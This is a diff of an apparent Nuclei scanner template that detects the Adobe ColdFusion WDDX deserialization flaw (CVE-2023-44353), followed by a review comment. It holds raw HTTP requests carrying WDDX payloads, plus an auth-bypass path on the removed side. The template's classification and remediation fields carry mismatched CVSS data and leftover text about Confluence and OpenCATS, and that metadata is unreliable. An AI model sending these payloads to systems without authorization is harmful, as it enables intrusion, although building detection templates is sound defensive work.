matcher & path update
parent
bc1a965327
commit
5b9a2cd29e
|
@ -1,113 +1,82 @@
|
|||
id: CVE-2023-44353
|
||||
|
||||
info:
|
||||
name: Adobe Coldfusion Auth Bypass + Remote Code Execution
|
||||
name: Adobe ColdFusion WDDX Deserialization Gadgets
|
||||
author: salts
|
||||
severity: critical
|
||||
description: |
|
||||
Adobe Coldfusion contains a persistent auth bypass issue previously tagged as CVE-2023-29298 and CVE-2023-38205, these ended up being difficult/impossible
|
||||
to patch, because the fault was actually in the production IIS/Apache connector, where a hard coded rule was put in place. If an administrator ran the
|
||||
"lockdown" or production installer, this vulnerable path would be exposed to the internet.
|
||||
Recently, a remote deserialization / code execution flaw CVE-2023-44353 as published with public POC. This template chains the common auth bypass
|
||||
with the public POC looking for two common folders either C:\windows\ or /etc/.
|
||||
|
||||
|
||||
reference:
|
||||
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
|
||||
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
|
||||
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
|
||||
remediation: |
|
||||
Update to the latest version of Confluence
|
||||
classification:
|
||||
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353
|
||||
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
|
||||
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-44353, CVE-2023-26347
|
||||
metadata:
|
||||
tags: cve,cve2023,adobe,coldfusion,auth-bypass,rce
|
||||
cve-id: CVE-2023-44353
|
||||
cwe-id: CWE-502
|
||||
epss-score: 0.00227
|
||||
epss-percentile: 0.60906
|
||||
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 4
|
||||
vendor: adobe
|
||||
product: coldfusion
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
tags: cve,cve2023,adobe,coldfusion
|
||||
|
||||
variables:
|
||||
version_path: "/hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true"
|
||||
version_path: "/CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true"
|
||||
windows_known_path: "C:\\Windows\\"
|
||||
windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
|
||||
linux_known_path: "/etc/"
|
||||
linux_bad_path: "/thesecretcowlevelisreal/"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
#Windows checks here..
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
|
||||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
|
||||
#Linux checks here..
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
|
||||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
|
||||
cookie-reuse: true
|
||||
redirects: true
|
||||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
- |
|
||||
POST {{version_path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
# First stage, I got a version via the auth bypass
|
||||
- type: dsl
|
||||
name: CVE-2023-26347
|
||||
name: windows
|
||||
dsl:
|
||||
- status_code_1 == 200
|
||||
- regex('wddxPacket', body_1)
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_1)
|
||||
condition: and
|
||||
# Second stage, I check for version success while sending filenames that should always exist on
|
||||
# the platform
|
||||
- "status_code_1 == 500 && status_code_2 == 404"
|
||||
- contains(body_1, "coldfusion.runtime")
|
||||
condition: and
|
||||
|
||||
# This checks for the vulnerability on windows by sending a check for C:\\Windows\\ and C:\\Thisdefinitelydoesnotexist
|
||||
# If vulnerable, the different packets should return different results. Specifically the first should
|
||||
# Return a 500, 404, or canned error message, where the second should return the expected version.
|
||||
- type: dsl
|
||||
name: CVE-2023-44353
|
||||
dsl:
|
||||
|
||||
- status_code_1 == 200
|
||||
- regex('wddxPacket', body_1)
|
||||
- regex('wddxPacket', body_3)
|
||||
# I get the version number back from body 1 and body 3, but not body 2
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_1)
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_3)
|
||||
- "!regex('\\d+,\\d+,\\d+,\\d+', body_2)"
|
||||
condition: and
|
||||
|
||||
# This checks for the vulnerability on Linux by sending a check for /etc and /thesecretcowlevelisreal/
|
||||
# If vulnerable, the different packets should return different results. Specifically the first should
|
||||
# Return a 500, 404, or canned error message, where the second should return the expected version.
|
||||
- type: dsl
|
||||
name: CVE-2023-44353
|
||||
dsl:
|
||||
|
||||
- status_code_1 == 200
|
||||
- regex('wddxPacket', body_1)
|
||||
- regex('wddxPacket', body_5)
|
||||
# I get the version number back from body 1 and body 3, but not body 2
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_1)
|
||||
- regex('\\d+,\\d+,\\d+,\\d+', body_5)
|
||||
- "!regex('\\d+,\\d+,\\d+,\\d+', body_4)"
|
||||
condition: and
|
||||
name: linux
|
||||
dsl:
|
||||
- "status_code_3 == 500 && status_code_4 == 404"
|
||||
- contains(body_3, "coldfusion.runtime")
|
||||
condition: and
|
||||
|
|
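Review bot: The classification block is internally inconsistent: the `cvss-metrics` vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` scores roughly 6.1 under CVSS 3.1 (the profile of a reflected-XSS finding), while `cvss-score: 9.8`, `severity: critical` and `cwe-id: CWE-502` describe an unauthenticated deserialization RCE, so one of them is wrong and the vector should be replaced with one that actually yields 9.8 for this CVE (constructed example of the expected shape: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`). In the same region the remediation text reads `Update to the latest version of Confluence` and a second mitigation sentence refers to OpenCATS and an XSS vulnerability; both look like copy-paste residue from unrelated templates, and I cannot tell from the rendered page which side they sit on, but whichever survives should point at the advisory already cited, e.g. `Update ColdFusion to the versions listed in Adobe APSB23-52`. The matcher comment `# I get the version number back from body 1 and body 3, but not body 2` appears under a block that checks body_4 and body_5, so if that comment remains on the new side it should be corrected or dropped. Finally, the new `windows`/`linux` dsl matchers key on a 500-vs-404 status difference between a known and a non-existent directory; that oracle presumably depends on the default error page, so a short comment stating that assumption would help future maintainers judge false positives.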